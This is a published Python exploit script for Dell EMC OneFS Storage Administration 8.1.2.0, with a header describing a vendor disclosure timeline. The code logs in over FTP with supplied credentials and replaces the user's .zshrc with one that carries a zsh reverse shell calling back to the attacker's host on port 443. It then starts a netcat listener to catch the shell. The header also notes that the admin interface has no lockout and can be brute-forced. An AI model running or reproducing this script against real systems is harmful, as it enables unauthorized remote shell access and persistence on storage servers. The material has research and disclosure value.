DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite

`#!/usr/bin/env python  
#  
# Exploit name : isilon-onefs-brute.py  
# Created date : 9/21/18  
# Submit Date : 10/10/18  
# Author : wetw0rk  
# Python version : 2.7  
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py   
# Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm  
# Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip  
# Tested on : DELL EMC OneFS Storage Administration 8.1.2.0  
#  
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil  
#  
# [------------ Timeline ------------]  
# 9/21/18 - Contacted Dell PSIRT  
# 9/25/18 - Sent POC code  
# 10/9/18 - Responded with "not considered a vulnerability"  
#  
# Description :  
# To exploit this vulnerability first you must gain access to the administrative  
# interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable  
# FTP like so:  
# -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!  
#  
# Since you're dropped in the user home directory and not a secluded FTP directory  
# you can inject into .zshrc, however as dell stated you can access other files on  
# the system as well....  
#  
  
import os  
import sys  
import socket  
import threading  
  
RED = "\033[1m\033[31m[-]\033[0m"  
BLUE = "\033[1m\033[94m[*]\033[0m"  
GREEN = "\033[1m\033[92m[+]\033[0m"  
  
def background_server(lhost):  
global check  
  
fd = open(".zshrc", 'w')  
  
host = "0.0.0.0"  
port = 50121  
sock = socket.socket(  
socket.AF_INET,  
socket.SOCK_STREAM  
)  
sock.bind((host, port))  
sock.listen(5)  
  
print("%s listening on %s:%s" % (BLUE, host,port))  
while True:  
conn, addr = sock.accept()  
if check != 1:  
zshrc_file = conn.recv(4096)  
print("%s generating .zshrc payload" % BLUE)  
fd.write(zshrc_file)  
# msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw  
fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)  
fd.close()  
else:  
with open('.zshrc', 'r') as myfile:  
data=myfile.read()  
conn.send(data)  
  
try:  
rhost = sys.argv[1]  
rport = int(sys.argv[2])  
lhost = sys.argv[3]  
username = sys.argv[4]  
password = sys.argv[5]  
except:  
print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])  
print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])  
exit(0)  
  
check = 0 # start a background server for download+uploads  
server_thread = threading.Thread(target=background_server, args=(lhost,))  
server_thread.start()  
  
# create a socket for the client sending the commands  
print("%s connecting to %s:%s" % (BLUE, rhost, rport))  
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
csock.connect((rhost, rport))  
csock.recv(4096)  
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))  
csock.send("USER %s\r\n" % username)  
csock.recv(4096)  
csock.send("PASS %s\r\n" % password)  
csock.recv(4096)  
print("%s login was successful downloading .zshrc" % GREEN)  
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121  
csock.recv(4096)  
csock.send("RETR .zshrc\r\n")  
csock.recv(4096)  
csock.send("RNFR .zshrc\r\n")  
csock.recv(4096)  
print("%s renaming remote .zshrc to .backup" % GREEN)  
csock.send("RNTO .backup\r\n")  
csock.recv(4096)  
check = 1  
print("%s uploading payload to target host" % GREEN)  
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121  
csock.recv(4096)  
csock.send("TYPE I\r\n")  
csock.recv(4096)  
csock.send("STOR .zshrc\r\n")  
print("%s exploitation complete waiting for %s to login" % (GREEN, username))  
os.system("nc -lvp 443")  
csock.close()  
`